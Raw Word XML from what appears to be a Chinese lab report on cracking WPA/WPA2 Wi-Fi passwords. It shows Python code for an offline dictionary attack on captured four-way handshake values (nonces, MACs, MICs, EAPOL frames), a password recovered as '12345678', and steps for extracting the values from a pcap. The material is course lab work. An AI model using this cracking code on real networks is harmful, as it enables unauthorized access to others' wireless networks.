          </w:p>
          <w:p w14:paraId="51E9C116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Computed MIC2:\t\t' + v2) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA13D4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\nDesired MIC2:\t\t' + targMic3) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B9009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print('Computed MIC2:\t\t' + v3) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F59AB3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print('Password:\t\t' + i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E09C2C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return i </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1781504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eturn None</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F1E91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1989139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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC2679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RunTest()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F0C175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Read a file of passwords containing #passwords separated by a newline </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE85380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with open('pwd-dictionary2.txt') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D828BE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 = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239FF9A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for l in f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B398CF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.append(l.strip()) #ssid name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79E14E3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sid = "Harkonen" #ANonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5381C10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aNonce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 a2b_hex('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33D74D4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SNonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BBD8C2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sNonce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59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570") #Authenticator MAC (AP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7277670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 xml:space="preserve">apMac = a2b_hex("00146c7e4080") #Station address: MAC of client </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69B7C471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cliMac = a2b_hex("001346fe320c") #The first MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F801AF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1 = "d5355382b8a9b806dcaf99cdaf564eb6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A658039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entire 802.1x frame of the second handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F4E8E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1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0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020100")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7897590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lastRenderedPageBreak/>
              <w:t>#The second MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613F587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2 = "1e228672d2dee930714f688c5746028d"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56313E2B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entire 802.1x frame of the third handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A2AE44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2</w:t>
            </w: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=a2b_hex("010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3dfb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A83ED15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The third MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="522AF314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  <w:p w14:paraId="54BC25CC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mic3 = "9dc81ca6c4c729648de7f00b436335c8"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5102F3A7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 xml:space="preserve">#The entire 802.1x frame of the forth handshake message with the MIC field set to all zeros </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794A20C3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ab/>
              <w:t>data3=a2b_hex("0103005f02030a0010000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD7C38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#Run an offline dictionary attack against the access point</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F7551CA" w14:textId="77777777" w:rsidR="00592443" w:rsidRPr="00592443" w:rsidRDefault="00592443" w:rsidP="00592443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  <w:r w:rsidRPr="00592443">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>TestPwds(S, ssid, aNonce, sNonce, apMac, cliMac, data1, data2, data3, mic1, mic2, mic3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C736455" w14:textId="1B16024F" w:rsidR="00C51568" w:rsidRPr="00592443" w:rsidRDefault="00C51568" w:rsidP="00F101A5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="728C6835" w14:textId="77777777" w:rsidR="000C4E5A" w:rsidRDefault="000C4E5A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</w:p>
    <w:p w14:paraId="36360953" w14:textId="0F86A8D3" w:rsidR="00C51568" w:rsidRDefault="00592443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567F78EB" wp14:editId="518DF5A3">
            <wp:extent cx="5274310" cy="37833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6BF6" w14:textId="781F4DB2" w:rsidR="000C4E5A" w:rsidRDefault="000C4E5A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rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试的代码破解出了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，为“12345678”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F48CC3" w14:textId="77777777" w:rsidR="000C4E5A" w:rsidRPr="00E55E2E" w:rsidRDefault="000C4E5A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</w:p>
    <w:p w14:paraId="5AA7FB80" w14:textId="01143D8C" w:rsidR="00A567F6" w:rsidRPr="0015145C" w:rsidRDefault="002A08AF" w:rsidP="002E5A76">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>八</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、实验</w:t>
      </w:r>
      <w:r w:rsidR="00FC60D2" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:r w:rsidR="00846B99" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="0087652B" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidR="00DF3AF4" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（含</w:t>
      </w:r>
      <w:r w:rsidR="00C92994">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>重要</w:t>
      </w:r>
      <w:r w:rsidR="00DF3AF4" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据结果分析</w:t>
      </w:r>
      <w:r w:rsidR="002E5A76" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="0015145C" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>核心</w:t>
      </w:r>
      <w:r w:rsidR="002E5A76" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidR="00DF3AF4" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>流程</w:t>
      </w:r>
      <w:r w:rsidR="002E5A76" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidR="00DF3AF4" w:rsidRPr="0015145C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7478632E" w14:textId="08A5D837" w:rsidR="006B072E" w:rsidRPr="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="006F00B9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1）</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>wifi-pwd-recovery-1.pcap</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA2742" w14:textId="44415685" w:rsidR="000C4E5A" w:rsidRDefault="000C4E5A" w:rsidP="006F00B9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代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RunTest()函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>注释掉，并更改相关数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA75E89" w14:textId="153F077A" w:rsidR="000C4E5A" w:rsidRPr="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="00A073B0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A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>找出</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssid值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dd-wrt2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A688749" w14:textId="6647BD0A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48376853" wp14:editId="10AA09D4">
            <wp:extent cx="2962275" cy="74295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C1D38" w14:textId="7A610827" w:rsidR="00A073B0" w:rsidRPr="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="00A073B0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通过EAPOL第一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>找出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ANo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC3303" w14:textId="7782C5C3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BCB3D15" wp14:editId="5EF30A32">
            <wp:extent cx="5057775" cy="42862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9C4F2" w14:textId="553DBD96" w:rsidR="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="00A073B0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A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EAPOL第二个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message找出</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SNonce</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mic1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB05C6" w14:textId="012A4A68" w:rsidR="00A073B0" w:rsidRP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A06AC85" wp14:editId="0D152417">
            <wp:extent cx="5038725" cy="2952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5907" w14:textId="7F163B8D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351E9701" wp14:editId="7193CE3D">
            <wp:extent cx="3657600" cy="2667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78F14" w14:textId="4DCA22C5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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EA4B223" wp14:editId="6F52C8FF">
            <wp:extent cx="4162425" cy="4381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77DB1" w14:textId="1BE36D29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D7C54E6" wp14:editId="45D1C79B">
            <wp:extent cx="3705225" cy="238125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8E4A" w14:textId="4E7537C5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57F00638" wp14:editId="2E2B7BEB">
            <wp:extent cx="4248150" cy="237172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95F0E" w14:textId="43A52E30" w:rsidR="00A073B0" w:rsidRPr="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="00A073B0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A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EAPOL第三个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message找出mic2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F98CAB4" w14:textId="59081EB3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653B5150" wp14:editId="2FAB4879">
            <wp:extent cx="3629025" cy="1714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A394" w14:textId="2315E1DF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74CCD461" wp14:editId="70FC88B8">
            <wp:extent cx="4229100" cy="298132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F890" w14:textId="7815C347" w:rsidR="00A073B0" w:rsidRPr="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="00A073B0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A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EAPOL第四个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>message找出mic3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00A073B0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AAB98" w14:textId="3B0B3A15" w:rsid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38D8CF7B" wp14:editId="709C663E">
            <wp:extent cx="3619500" cy="1905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FE49" w14:textId="0B563038" w:rsidR="00A073B0" w:rsidRPr="00A073B0" w:rsidRDefault="00A073B0" w:rsidP="00A073B0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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04848A12" wp14:editId="6BB19114">
            <wp:extent cx="4276725" cy="202882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E8AC0" w14:textId="3913CC6D" w:rsidR="000C4E5A" w:rsidRPr="00754468" w:rsidRDefault="00A073B0" w:rsidP="00754468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/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行程序，</w:t>
      </w:r>
      <w:r w:rsidR="000C4E5A" w:rsidRPr="00754468">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下面仅放出更改部分代码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4E5A" w14:paraId="13C68A2B" w14:textId="77777777" w:rsidTr="000C4E5A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D0CE3AA" w14:textId="3099334C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if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4286B804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#RunTest()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454E4154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#Read a file of passwords containing </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662CFF1E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#passwords separated by a newline </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6744064D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with open('passwd.txt') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B2A119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>S = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ADB0FDA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>for l in f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20FBFAE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>S.append(l.strip()) #ssid name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DD47E06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ssid = "dd-wrt2" #ANonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BF3A8C9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aNonce</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>= a2b_hex('5f5502ba400cd7827ad3db093b855ca0f595f77b1dccc42977e9dea9c2e1d412')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9F038F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SNonce</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485844F0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sNonce</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">=a2b_hex("fd5626a59688a6da5bb338d6595b4995ed9342de1f15be7281b3fee6a8db9130") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D5989AB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Authenticator MAC (AP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F03673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 xml:space="preserve">apMac = a2b_hex("0018f8f5c2c6") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="709ACF97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Station address: MAC of client </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E1AB961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 xml:space="preserve">cliMac = a2b_hex("00259c749592") </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6246C33C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The first MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FBCBE85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lastRenderedPageBreak/>
              <w:tab/>
              <w:t>mic1 = "7bdd55553f0bd9ad4c78112200e4486b"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E5D979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entire 802.1x frame of the second handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD4B2AE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1</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>=a2b_hex("0103007502010a00000000000000000001fd5626a59688a6da5bb338d6595b4995ed9342de1f15be7281b3fee6a8db9130000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CD767C6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second MIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB4D101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mic2 = "e60f0dfe5ea596c513f92a24961efe75"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49C2BE1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entire 802.1x frame of the third handshake message with the MIC field set to all zeros</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F02A6E8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2</w:t>
            </w:r>
            <w:r w:rsidRPr="002C07DE">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>=a2b_hex("010300af0213ca001000000000000000025f5502ba400cd7827ad3db093b855ca0f595f77b1dccc42977e9dea9c2e1d412520ddd5be7ecc1ecb026276e0e41aaeafc0000000000000000000000000000000000000000000000000000000000000000502c8d27f09d60467190ac5f9ce0069669b3f7ad5eb4be68f27481dec2e688d1541a1c28256f373208482711afdd931a44eb66fac73881267af8d345f07d63e16d33a6c56e35d26e98432997bc4a87faa2")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33CA017A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third MIC</w:t>
            </w:r>
          </w:p>
